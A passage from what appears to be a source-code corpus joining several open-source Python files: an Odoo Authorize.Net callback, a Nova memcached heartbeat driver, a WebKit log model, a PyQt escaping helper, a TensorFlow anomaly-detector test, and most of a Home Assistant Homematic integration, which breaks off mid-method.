def authorize_form_feedback(self, **post):
_logger.info('Authorize: entering form_feedback with post data %s', pprint.pformat(post))
return_url = '/'
if post:
request.env['payment.transaction'].sudo().form_feedback(post, 'authorize')
return_url = post.pop('return_url', '/')
base_url = request.env['ir.config_parameter'].get_param('web.base.url')
# Authorize.Net is expecting a response to the POST sent by their server.
# This response is in the form of a URL that Authorize.Net will pass on to the
# client's browser to redirect them to the desired location need javascript.
return request.render('payment_authorize.payment_authorize_redirect', {
'return_url': '%s' % urlparse.urljoin(base_url, return_url)
})
| agpl-3.0 |
CEG-FYP-OpenStack/scheduler | nova/servicegroup/drivers/mc.py | 7 | 3516 | # Service heartbeat driver using Memcached
# Copyright (c) 2013 Akira Yoshiyama <akirayoshiyama at gmail dot com>
#
# This is derived from nova/servicegroup/drivers/db.py.
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import timeutils
from nova import cache_utils
from nova.i18n import _, _LI, _LW
from nova.servicegroup import api
from nova.servicegroup.drivers import base
CONF = cfg.CONF
CONF.import_opt('service_down_time', 'nova.service')
LOG = logging.getLogger(__name__)
class MemcachedDriver(base.Driver):
def __init__(self, *args, **kwargs):
self.mc = cache_utils.get_memcached_client(
expiration_time=CONF.service_down_time)
def join(self, member_id, group_id, service=None):
"""Join the given service with its group."""
LOG.debug('Memcached_Driver: join new ServiceGroup member '
'%(member_id)s to the %(group_id)s group, '
'service = %(service)s',
{'member_id': member_id,
'group_id': group_id,
'service': service})
if service is None:
raise RuntimeError(_('service is a mandatory argument for '
'Memcached based ServiceGroup driver'))
report_interval = service.report_interval
if report_interval:
service.tg.add_timer(report_interval, self._report_state,
api.INITIAL_REPORTING_DELAY, service)
def is_up(self, service_ref):
"""Moved from nova.utils
Check whether a service is up based on last heartbeat.
"""
key = "%(topic)s:%(host)s" % service_ref
is_up = self.mc.get(str(key)) is not None
if not is_up:
LOG.debug('Seems service %s is down' % key)
return is_up
def _report_state(self, service):
"""Update the state of this service in the datastore."""
try:
key = "%(topic)s:%(host)s" % service.service_ref
# memcached has data expiration time capability.
# set(..., time=CONF.service_down_time) uses it and
# reduces key-deleting code.
self.mc.set(str(key),
timeutils.utcnow())
# TODO(termie): make this pattern be more elegant.
if getattr(service, 'model_disconnected', False):
service.model_disconnected = False
LOG.info(
_LI('Recovered connection to memcache server '
'for reporting service status.'))
# TODO(vish): this should probably only catch connection errors
except Exception:
if not getattr(service, 'model_disconnected', False):
service.model_disconnected = True
LOG.warn(_LW('Lost connection to memcache server '
'for reporting service status.'))
| apache-2.0 |
jkburges/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/model/warninglog.py | 122 | 2147 | # Copyright (C) 2013 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from time import time
from datetime import datetime
from google.appengine.ext import db
class WarningLog(db.Model):
date = db.DateTimeProperty(auto_now_add=True)
event = db.StringProperty()
message = db.StringProperty()
attachment_id = db.IntegerProperty()
queue_name = db.StringProperty()
bot_id = db.StringProperty()
@classmethod
def record(cls, event, message=None, attachment_id=None, queue_name=None, bot_id=None):
entity = cls(event=event, message=message, queue_name=queue_name, bot_id=bot_id, attachment_id=attachment_id)
entity.put()
return entity
| bsd-3-clause |
pyqt/python-qt5 | PyQt5/uic/port_v2/as_string.py | 2 | 1435 | #############################################################################
##
## Copyright (c) 2016 Riverbank Computing Limited <info@riverbankcomputing.com>
##
## This file is part of PyQt5.
##
## This file may be used under the terms of the GNU General Public License
## version 3.0 as published by the Free Software Foundation and appearing in
## the file LICENSE included in the packaging of this file. Please review the
## following information to ensure the GNU General Public License version 3.0
## requirements will be met: http://www.gnu.org/copyleft/gpl.html.
##
## If you do not wish to use this file under the terms of the GPL version 3.0
## then you may purchase a commercial license. For more information contact
## info@riverbankcomputing.com.
##
## This file is provided AS IS with NO WARRANTY OF ANY KIND, INCLUDING THE
## WARRANTY OF DESIGN, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
##
#############################################################################
import re
def as_string(obj):
if isinstance(obj, basestring):
return '"' + _escape(obj.encode('UTF-8')) + '"'
return str(obj)
_esc_regex = re.compile(r"(\"|\'|\\)")
def _escape(text):
# This escapes any escaped single or double quote or backslash.
x = _esc_regex.sub(r"\\\1", text)
# This replaces any '\n' with an escaped version and a real line break.
return re.sub(r'\n', r'\\n"\n"', x)
| gpl-3.0 |
rabipanda/tensorflow | tensorflow/contrib/timeseries/python/timeseries/state_space_models/filtering_postprocessor_test.py | 67 | 3176 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for filtering postprocessors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.timeseries.python.timeseries.state_space_models import filtering_postprocessor
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.platform import test
class FilteringStepPostprocessorTest(test.TestCase):
def test_gaussian_alternative(self):
for float_dtype in [dtypes.float32, dtypes.float64]:
detector = filtering_postprocessor.StateInterpolatingAnomalyDetector(
anomaly_log_likelihood=(filtering_postprocessor
.cauchy_alternative_to_gaussian),
responsibility_scaling=10.)
predicted_state = [
constant_op.constant(
[[40.], [20.]], dtype=float_dtype), constant_op.constant(
[3., 6.], dtype=float_dtype), constant_op.constant([-1, -2])
]
filtered_state = [
constant_op.constant(
[[80.], [180.]], dtype=float_dtype), constant_op.constant(
[1., 2.], dtype=float_dtype), constant_op.constant([-1, -2])
]
interpolated_state, updated_outputs = detector.process_filtering_step(
current_times=constant_op.constant([1, 2]),
current_values=constant_op.constant([[0.], [1.]], dtype=float_dtype),
predicted_state=predicted_state,
filtered_state=filtered_state,
outputs={
"mean":
constant_op.constant([[0.1], [10.]], dtype=float_dtype),
"covariance":
constant_op.constant([[[1.0]], [[1.0]]], dtype=float_dtype),
"log_likelihood":
constant_op.constant([-1., -40.], dtype=float_dtype)
})
# The first batch element is not anomalous, and so should use the inferred
# state. The second is anomalous, and should use the predicted state.
expected_state = [[[80.], [20.]],
[1., 6.],
[-1, -2]]
with self.test_session():
for interpolated, expected in zip(interpolated_state, expected_state):
self.assertAllClose(expected, interpolated.eval())
self.assertGreater(0., updated_outputs["anomaly_score"][0].eval())
self.assertLess(0., updated_outputs["anomaly_score"][1].eval())
if __name__ == "__main__":
test.main()
| apache-2.0 |
miniconfig/home-assistant | homeassistant/components/homematic.py | 5 | 28822 | """
Support for Homematic devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/homematic/
"""
import os
import time
import logging
from datetime import timedelta
from functools import partial
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import (
EVENT_HOMEASSISTANT_STOP, STATE_UNKNOWN, CONF_USERNAME, CONF_PASSWORD,
CONF_PLATFORM, CONF_HOSTS, CONF_NAME, ATTR_ENTITY_ID)
from homeassistant.helpers import discovery
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.event import track_time_interval
from homeassistant.config import load_yaml_config_file
DOMAIN = 'homematic'
REQUIREMENTS = ["pyhomematic==0.1.22"]
SCAN_INTERVAL_HUB = timedelta(seconds=300)
SCAN_INTERVAL_VARIABLES = timedelta(seconds=30)
DISCOVER_SWITCHES = 'homematic.switch'
DISCOVER_LIGHTS = 'homematic.light'
DISCOVER_SENSORS = 'homematic.sensor'
DISCOVER_BINARY_SENSORS = 'homematic.binary_sensor'
DISCOVER_COVER = 'homematic.cover'
DISCOVER_CLIMATE = 'homematic.climate'
ATTR_DISCOVER_DEVICES = 'devices'
ATTR_PARAM = 'param'
ATTR_CHANNEL = 'channel'
ATTR_NAME = 'name'
ATTR_ADDRESS = 'address'
ATTR_VALUE = 'value'
ATTR_PROXY = 'proxy'
EVENT_KEYPRESS = 'homematic.keypress'
EVENT_IMPULSE = 'homematic.impulse'
SERVICE_VIRTUALKEY = 'virtualkey'
SERVICE_RECONNECT = 'reconnect'
SERVICE_SET_VAR_VALUE = 'set_var_value'
SERVICE_SET_DEV_VALUE = 'set_dev_value'
HM_DEVICE_TYPES = {
DISCOVER_SWITCHES: [
'Switch', 'SwitchPowermeter', 'IOSwitch', 'IPSwitch',
'IPSwitchPowermeter', 'KeyMatic', 'HMWIOSwitch'],
DISCOVER_LIGHTS: ['Dimmer', 'KeyDimmer'],
DISCOVER_SENSORS: [
'SwitchPowermeter', 'Motion', 'MotionV2', 'RemoteMotion', 'MotionIP',
'ThermostatWall', 'AreaThermostat', 'RotaryHandleSensor',
'WaterSensor', 'PowermeterGas', 'LuxSensor', 'WeatherSensor',
'WeatherStation', 'ThermostatWall2', 'TemperatureDiffSensor',
'TemperatureSensor', 'CO2Sensor', 'IPSwitchPowermeter', 'HMWIOSwitch'],
DISCOVER_CLIMATE: [
'Thermostat', 'ThermostatWall', 'MAXThermostat', 'ThermostatWall2',
'MAXWallThermostat', 'IPThermostat'],
DISCOVER_BINARY_SENSORS: [
'ShutterContact', 'Smoke', 'SmokeV2', 'Motion', 'MotionV2',
'RemoteMotion', 'WeatherSensor', 'TiltSensor', 'IPShutterContact',
'HMWIOSwitch', 'MaxShutterContact'],
DISCOVER_COVER: ['Blind', 'KeyBlind']
}
HM_IGNORE_DISCOVERY_NODE = [
'ACTUAL_TEMPERATURE',
'ACTUAL_HUMIDITY'
]
HM_ATTRIBUTE_SUPPORT = {
'LOWBAT': ['battery', {0: 'High', 1: 'Low'}],
'ERROR': ['sabotage', {0: 'No', 1: 'Yes'}],
'RSSI_DEVICE': ['rssi', {}],
'VALVE_STATE': ['valve', {}],
'BATTERY_STATE': ['battery', {}],
'CONTROL_MODE': ['mode', {0: 'Auto', 1: 'Manual', 2: 'Away', 3: 'Boost'}],
'POWER': ['power', {}],
'CURRENT': ['current', {}],
'VOLTAGE': ['voltage', {}],
'WORKING': ['working', {0: 'No', 1: 'Yes'}],
}
HM_PRESS_EVENTS = [
'PRESS_SHORT',
'PRESS_LONG',
'PRESS_CONT',
'PRESS_LONG_RELEASE',
'PRESS',
]
HM_IMPULSE_EVENTS = [
'SEQUENCE_OK',
]
_LOGGER = logging.getLogger(__name__)
CONF_RESOLVENAMES_OPTIONS = [
'metadata',
'json',
'xml',
False
]
DATA_HOMEMATIC = 'homematic'
DATA_DELAY = 'homematic_delay'
DATA_DEVINIT = 'homematic_devinit'
DATA_STORE = 'homematic_store'
CONF_LOCAL_IP = 'local_ip'
CONF_LOCAL_PORT = 'local_port'
CONF_IP = 'ip'
CONF_PORT = 'port'
CONF_CALLBACK_IP = "callback_ip"
CONF_CALLBACK_PORT = "callback_port"
CONF_RESOLVENAMES = 'resolvenames'
CONF_VARIABLES = 'variables'
CONF_DEVICES = 'devices'
CONF_DELAY = 'delay'
CONF_PRIMARY = 'primary'
DEFAULT_LOCAL_IP = "0.0.0.0"
DEFAULT_LOCAL_PORT = 0
DEFAULT_RESOLVENAMES = False
DEFAULT_PORT = 2001
DEFAULT_USERNAME = "Admin"
DEFAULT_PASSWORD = ""
DEFAULT_VARIABLES = False
DEFAULT_DEVICES = True
DEFAULT_DELAY = 0.5
DEFAULT_PRIMARY = False
DEVICE_SCHEMA = vol.Schema({
vol.Required(CONF_PLATFORM): "homematic",
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_ADDRESS): cv.string,
vol.Required(ATTR_PROXY): cv.string,
vol.Optional(ATTR_CHANNEL, default=1): vol.Coerce(int),
vol.Optional(ATTR_PARAM): cv.string,
})
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_HOSTS): {cv.match_all: {
vol.Required(CONF_IP): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT):
cv.port,
vol.Optional(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Optional(CONF_VARIABLES, default=DEFAULT_VARIABLES):
cv.boolean,
vol.Optional(CONF_RESOLVENAMES, default=DEFAULT_RESOLVENAMES):
vol.In(CONF_RESOLVENAMES_OPTIONS),
vol.Optional(CONF_DEVICES, default=DEFAULT_DEVICES): cv.boolean,
vol.Optional(CONF_PRIMARY, default=DEFAULT_PRIMARY): cv.boolean,
vol.Optional(CONF_CALLBACK_IP): cv.string,
vol.Optional(CONF_CALLBACK_PORT): cv.port,
}},
vol.Optional(CONF_LOCAL_IP, default=DEFAULT_LOCAL_IP): cv.string,
vol.Optional(CONF_LOCAL_PORT, default=DEFAULT_LOCAL_PORT): cv.port,
vol.Optional(CONF_DELAY, default=DEFAULT_DELAY): vol.Coerce(float),
}),
}, extra=vol.ALLOW_EXTRA)
SCHEMA_SERVICE_VIRTUALKEY = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): cv.string,
vol.Optional(ATTR_PROXY): cv.string,
})
SCHEMA_SERVICE_SET_VAR_VALUE = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
})
SCHEMA_SERVICE_SET_DEV_VALUE = vol.Schema({
vol.Required(ATTR_ADDRESS): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_CHANNEL): vol.Coerce(int),
vol.Required(ATTR_PARAM): vol.All(cv.string, vol.Upper),
vol.Required(ATTR_VALUE): cv.match_all,
vol.Optional(ATTR_PROXY): cv.string,
})
SCHEMA_SERVICE_RECONNECT = vol.Schema({})
def virtualkey(hass, address, channel, param, proxy=None):
"""Send virtual keypress to homematic controlller."""
data = {
ATTR_ADDRESS: address,
ATTR_CHANNEL: channel,
ATTR_PARAM: param,
ATTR_PROXY: proxy,
}
hass.services.call(DOMAIN, SERVICE_VIRTUALKEY, data)
def set_var_value(hass, entity_id, value):
"""Change value of homematic system variable."""
data = {
ATTR_ENTITY_ID: entity_id,
ATTR_VALUE: value,
}
hass.services.call(DOMAIN, SERVICE_SET_VAR_VALUE, data)
def set_dev_value(hass, address, channel, param, value, proxy=None):
"""Send virtual keypress to homematic controlller."""
data = {
ATTR_ADDRESS: address,
ATTR_CHANNEL: channel,
ATTR_PARAM: param,
ATTR_VALUE: value,
ATTR_PROXY: proxy,
}
hass.services.call(DOMAIN, SERVICE_SET_DEV_VALUE, data)
def reconnect(hass):
"""Reconnect to CCU/Homegear."""
hass.services.call(DOMAIN, SERVICE_RECONNECT, {})
# pylint: disable=unused-argument
def setup(hass, config):
"""Setup the Homematic component."""
from pyhomematic import HMConnection
hass.data[DATA_DELAY] = config[DOMAIN].get(CONF_DELAY)
hass.data[DATA_DEVINIT] = {}
hass.data[DATA_STORE] = []
# create hosts list for pyhomematic
remotes = {}
hosts = {}
for rname, rconfig in config[DOMAIN][CONF_HOSTS].items():
server = rconfig.get(CONF_IP)
remotes[rname] = {}
remotes[rname][CONF_IP] = server
remotes[rname][CONF_PORT] = rconfig.get(CONF_PORT)
remotes[rname][CONF_RESOLVENAMES] = rconfig.get(CONF_RESOLVENAMES)
remotes[rname][CONF_USERNAME] = rconfig.get(CONF_USERNAME)
remotes[rname][CONF_PASSWORD] = rconfig.get(CONF_PASSWORD)
remotes[rname]['callbackip'] = rconfig.get(CONF_CALLBACK_IP)
remotes[rname]['callbackport'] = rconfig.get(CONF_CALLBACK_PORT)
if server not in hosts or rconfig.get(CONF_PRIMARY):
hosts[server] = {
CONF_VARIABLES: rconfig.get(CONF_VARIABLES),
CONF_NAME: rname,
}
hass.data[DATA_DEVINIT][rname] = rconfig.get(CONF_DEVICES)
# Create server thread
bound_system_callback = partial(_system_callback_handler, hass, config)
hass.data[DATA_HOMEMATIC] = HMConnection(
local=config[DOMAIN].get(CONF_LOCAL_IP),
localport=config[DOMAIN].get(CONF_LOCAL_PORT),
remotes=remotes,
systemcallback=bound_system_callback,
interface_id="homeassistant"
)
# Start server thread, connect to peer, initialize to receive events
hass.data[DATA_HOMEMATIC].start()
# Stops server when Homeassistant is shutting down
hass.bus.listen_once(
EVENT_HOMEASSISTANT_STOP, hass.data[DATA_HOMEMATIC].stop)
# init homematic hubs
entity_hubs = []
for _, hub_data in hosts.items():
entity_hubs.append(HMHub(
hass, hub_data[CONF_NAME], hub_data[CONF_VARIABLES]))
# regeister homematic services
descriptions = load_yaml_config_file(
os.path.join(os.path.dirname(__file__), 'services.yaml'))
def _hm_service_virtualkey(service):
"""Service handle virtualkey services."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
# device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found for service virtualkey!", address)
return
# if param exists for this device
if param not in hmdevice.ACTIONNODE:
_LOGGER.error("%s not datapoint in hm device %s", param, address)
return
# channel exists?
if channel not in hmdevice.ACTIONNODE[param]:
_LOGGER.error("%i is not a channel in hm device %s",
channel, address)
return
# call key
hmdevice.actionNodeData(param, True, channel)
hass.services.register(
DOMAIN, SERVICE_VIRTUALKEY, _hm_service_virtualkey,
descriptions[DOMAIN][SERVICE_VIRTUALKEY],
schema=SCHEMA_SERVICE_VIRTUALKEY)
def _service_handle_value(service):
"""Set value on homematic variable."""
entity_ids = service.data.get(ATTR_ENTITY_ID)
name = service.data[ATTR_NAME]
value = service.data[ATTR_VALUE]
if entity_ids:
entities = [entity for entity in entity_hubs if
entity.entity_id in entity_ids]
else:
entities = entity_hubs
if not entities:
_LOGGER.error("Homematic controller not found!")
return
for hub in entities:
hub.hm_set_variable(name, value)
hass.services.register(
DOMAIN, SERVICE_SET_VAR_VALUE, _service_handle_value,
descriptions[DOMAIN][SERVICE_SET_VAR_VALUE],
schema=SCHEMA_SERVICE_SET_VAR_VALUE)
def _service_handle_reconnect(service):
"""Reconnect to all homematic hubs."""
hass.data[DATA_HOMEMATIC].reconnect()
hass.services.register(
DOMAIN, SERVICE_RECONNECT, _service_handle_reconnect,
descriptions[DOMAIN][SERVICE_RECONNECT],
schema=SCHEMA_SERVICE_RECONNECT)
def _service_handle_device(service):
"""Service handle set_dev_value services."""
address = service.data.get(ATTR_ADDRESS)
channel = service.data.get(ATTR_CHANNEL)
param = service.data.get(ATTR_PARAM)
value = service.data.get(ATTR_VALUE)
# device not found
hmdevice = _device_from_servicecall(hass, service)
if hmdevice is None:
_LOGGER.error("%s not found!", address)
return
# call key
hmdevice.setValue(param, value, channel)
hass.services.register(
DOMAIN, SERVICE_SET_DEV_VALUE, _service_handle_device,
descriptions[DOMAIN][SERVICE_SET_DEV_VALUE],
schema=SCHEMA_SERVICE_SET_DEV_VALUE)
return True
def _system_callback_handler(hass, config, src, *args):
"""Callback handler."""
if src == 'newDevices':
_LOGGER.debug("newDevices with: %s", args)
# pylint: disable=unused-variable
(interface_id, dev_descriptions) = args
proxy = interface_id.split('-')[-1]
# device support active?
if not hass.data[DATA_DEVINIT][proxy]:
return
##
# Get list of all keys of the devices (ignoring channels)
key_dict = {}
for dev in dev_descriptions:
key_dict[dev['ADDRESS'].split(':')[0]] = True
##
# remove device they allready init by HA
tmp_devs = key_dict.copy()
for dev in tmp_devs:
if dev in hass.data[DATA_STORE]:
del key_dict[dev]
else:
hass.data[DATA_STORE].append(dev)
# Register EVENTS
# Search all device with a EVENTNODE that include data
bound_event_callback = partial(_hm_event_handler, hass, proxy)
for dev in key_dict:
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(dev)
# have events?
if len(hmdevice.EVENTNODE) > 0:
_LOGGER.debug("Register Events from %s", dev)
hmdevice.setEventCallback(callback=bound_event_callback,
bequeath=True)
# If configuration allows autodetection of devices,
# all devices not configured are added.
if key_dict:
for component_name, discovery_type in (
('switch', DISCOVER_SWITCHES),
('light', DISCOVER_LIGHTS),
('cover', DISCOVER_COVER),
('binary_sensor', DISCOVER_BINARY_SENSORS),
('sensor', DISCOVER_SENSORS),
('climate', DISCOVER_CLIMATE)):
# Get all devices of a specific type
found_devices = _get_devices(
hass, discovery_type, key_dict, proxy)
# When devices of this type are found
# they are setup in HA and an event is fired
if found_devices:
# Fire discovery event
discovery.load_platform(hass, component_name, DOMAIN, {
ATTR_DISCOVER_DEVICES: found_devices
}, config)
def _get_devices(hass, discovery_type, keys, proxy):
"""Get the Homematic devices for given discovery_type."""
device_arr = []
for key in keys:
device = hass.data[DATA_HOMEMATIC].devices[proxy][key]
class_name = device.__class__.__name__
metadata = {}
# Class supported by discovery type
if class_name not in HM_DEVICE_TYPES[discovery_type]:
continue
# Load metadata if needed to generate a param list
if discovery_type == DISCOVER_SENSORS:
metadata.update(device.SENSORNODE)
elif discovery_type == DISCOVER_BINARY_SENSORS:
metadata.update(device.BINARYNODE)
else:
metadata.update({None: device.ELEMENT})
if metadata:
# Generate options for 1...n elements with 1...n params
for param, channels in metadata.items():
if param in HM_IGNORE_DISCOVERY_NODE:
continue
# Add devices
_LOGGER.debug("%s: Handling %s: %s: %s",
discovery_type, key, param, channels)
for channel in channels:
name = _create_ha_name(
name=device.NAME, channel=channel, param=param,
count=len(channels)
)
device_dict = {
CONF_PLATFORM: "homematic",
ATTR_ADDRESS: key,
ATTR_PROXY: proxy,
ATTR_NAME: name,
ATTR_CHANNEL: channel
}
if param is not None:
device_dict[ATTR_PARAM] = param
# Add new device
try:
DEVICE_SCHEMA(device_dict)
device_arr.append(device_dict)
except vol.MultipleInvalid as err:
_LOGGER.error("Invalid device config: %s",
str(err))
else:
_LOGGER.debug("Got no params for %s", key)
_LOGGER.debug("%s autodiscovery done: %s", discovery_type, str(device_arr))
return device_arr
def _create_ha_name(name, channel, param, count):
"""Generate a unique object name."""
# HMDevice is a simple device
if count == 1 and param is None:
return name
# Has multiple elements/channels
if count > 1 and param is None:
return "{} {}".format(name, channel)
# With multiple param first elements
if count == 1 and param is not None:
return "{} {}".format(name, param)
# Multiple param on object with multiple elements
if count > 1 and param is not None:
return "{} {} {}".format(name, channel, param)
def _hm_event_handler(hass, proxy, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
try:
channel = int(device.split(":")[1])
address = device.split(":")[0]
hmdevice = hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
except (TypeError, ValueError):
_LOGGER.error("Event handling channel convert error!")
return
# is not a event?
if attribute not in hmdevice.EVENTNODE:
return
_LOGGER.debug("Event %s for %s channel %i", attribute,
hmdevice.NAME, channel)
# keypress event
if attribute in HM_PRESS_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_PARAM: attribute,
ATTR_CHANNEL: channel
}))
return
# impulse event
if attribute in HM_IMPULSE_EVENTS:
hass.add_job(hass.bus.async_fire(EVENT_KEYPRESS, {
ATTR_NAME: hmdevice.NAME,
ATTR_CHANNEL: channel
}))
return
_LOGGER.warning("Event is unknown and not forwarded to HA")
def _device_from_servicecall(hass, service):
"""Extract homematic device from service call."""
address = service.data.get(ATTR_ADDRESS)
proxy = service.data.get(ATTR_PROXY)
if proxy:
return hass.data[DATA_HOMEMATIC].devices[proxy].get(address)
for _, devices in hass.data[DATA_HOMEMATIC].devices.items():
if address in devices:
return devices[address]
class HMHub(Entity):
"""The Homematic hub. I.e. CCU2/HomeGear."""
def __init__(self, hass, name, use_variables):
"""Initialize Homematic hub."""
self.hass = hass
self.entity_id = "{}.{}".format(DOMAIN, name.lower())
self._homematic = hass.data[DATA_HOMEMATIC]
self._variables = {}
self._name = name
self._state = STATE_UNKNOWN
self._use_variables = use_variables
# load data
track_time_interval(hass, self._update_hub, SCAN_INTERVAL_HUB)
self._update_hub(None)
if self._use_variables:
track_time_interval(
hass, self._update_variables, SCAN_INTERVAL_VARIABLES)
self._update_variables(None)
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def should_poll(self):
"""Return false. Homematic Hub object update variable."""
return False
@property
def state(self):
"""Return the state of the entity."""
return self._state
@property
def state_attributes(self):
"""Return the state attributes."""
attr = self._variables.copy()
return attr
@property
def icon(self):
"""Return the icon to use in the frontend, if any."""
return "mdi:gradient"
def _update_hub(self, now):
"""Retrieve latest state."""
state = self._homematic.getServiceMessages(self._name)
self._state = STATE_UNKNOWN if state is None else len(state)
self.schedule_update_ha_state()
def _update_variables(self, now):
"""Retrive all variable data and update hmvariable states."""
variables = self._homematic.getAllSystemVariables(self._name)
if variables is None:
return
state_change = False
for key, value in variables.items():
if key in self._variables and value == self._variables[key]:
continue
state_change = True
self._variables.update({key: value})
if state_change:
self.schedule_update_ha_state()
def hm_set_variable(self, name, value):
"""Set variable on homematic controller."""
if name not in self._variables:
_LOGGER.error("Variable %s not found on %s", name, self.name)
return
old_value = self._variables.get(name)
if isinstance(old_value, bool):
value = cv.boolean(value)
else:
value = float(value)
self._homematic.setSystemVariable(self.name, name, value)
self._variables.update({name: value})
self.schedule_update_ha_state()
class HMDevice(Entity):
"""The Homematic device base object."""
def __init__(self, hass, config):
"""Initialize a generic Homematic device."""
self.hass = hass
self._homematic = hass.data[DATA_HOMEMATIC]
self._name = config.get(ATTR_NAME)
self._address = config.get(ATTR_ADDRESS)
self._proxy = config.get(ATTR_PROXY)
self._channel = config.get(ATTR_CHANNEL)
self._state = config.get(ATTR_PARAM)
self._data = {}
self._hmdevice = None
self._connected = False
self._available = False
# Set param to uppercase
if self._state:
self._state = self._state.upper()
@property
def should_poll(self):
"""Return false. Homematic states are pushed by the XML RPC Server."""
return False
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def assumed_state(self):
"""Return true if unable to access real state of the device."""
return not self._available
@property
def available(self):
"""Return true if device is available."""
return self._available
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
attr = {}
# no data available to create
if not self.available:
return attr
# Generate an attributes list
for node, data in HM_ATTRIBUTE_SUPPORT.items():
# Is an attributes and exists for this object
if node in self._data:
value = data[1].get(self._data[node], self._data[node])
attr[data[0]] = value
# static attributes
attr['id'] = self._hmdevice.ADDRESS
attr['proxy'] = self._proxy
return attr
def link_homematic(self):
"""Connect to Homematic."""
# device is already linked
if self._connected:
return True
# Init
self._hmdevice = self._homematic.devices[self._proxy][self._address]
self._connected = True
# Check if Homematic class is okay for HA class
_LOGGER.info("Start linking %s to %s", self._address, self._name)
try:
# Init datapoints of this object
self._init_data()
if self.hass.data[DATA_DELAY]:
# We delay / pause loading of data to avoid overloading
# of CCU / Homegear when doing auto detection
time.sleep(self.hass.data[DATA_DELAY])
self._load_data_from_hm()
_LOGGER.debug("%s datastruct: %s", self._name, str(self._data))
# Link events from pyhomatic
self._subscribe_homematic_events()
self._available = not self._hmdevice.UNREACH
_LOGGER.debug("%s linking done", self._name)
# pylint: disable=broad-except
except Exception as err:
self._connected = False
_LOGGER.error("Exception while linking %s: %s",
self._address, str(err))
def _hm_event_callback(self, device, caller, attribute, value):
"""Handle all pyhomematic device events."""
_LOGGER.debug("%s received event '%s' value: %s", self._name,
attribute, value)
have_change = False
# Is data needed for this instance?
if attribute in self._data:
# Did data change?
if self._data[attribute] != value:
self._data[attribute] = value
have_change = True
# If available it has changed
if attribute == 'UNREACH':
self._available = bool(value)
have_change = True
# If it has changed data point, update HA
if have_change:
_LOGGER.debug("%s update_ha_state after '%s'", self._name,
attribute)
self.schedule_update_ha_state()
def _subscribe_homematic_events(self):
"""Subscribe all required events to handle job."""
channels_to_sub = {0: True} # add channel 0 for UNREACH
# Push data to channels_to_sub from hmdevice metadata
for metadata in (self._hmdevice.SENSORNODE, self._hmdevice.BINARYNODE,
self._hmdevice.ATTRIBUTENODE,
